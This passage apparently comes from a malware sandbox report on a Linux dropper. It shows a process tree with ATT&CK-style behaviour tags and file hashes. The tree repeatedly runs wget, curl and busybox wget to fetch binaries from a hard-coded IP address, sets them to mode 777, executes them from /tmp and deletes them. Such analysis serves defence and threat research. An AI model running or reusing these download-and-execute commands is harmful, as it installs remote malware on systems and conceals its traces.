- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:924
-
-
/bin/chmodchmod 777 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB./KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:930
-
-
/bin/chmodchmod 777 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES./sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:936
-
-
/bin/chmodchmod 777 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT./2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:942
-
-
/bin/chmodchmod 777 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW./UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:948
-
-
/bin/chmodchmod 777 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc./SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:954
-
-
/bin/chmodchmod 777 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt./LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:960
-
-
/bin/chmodchmod 777 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517./LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:963
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97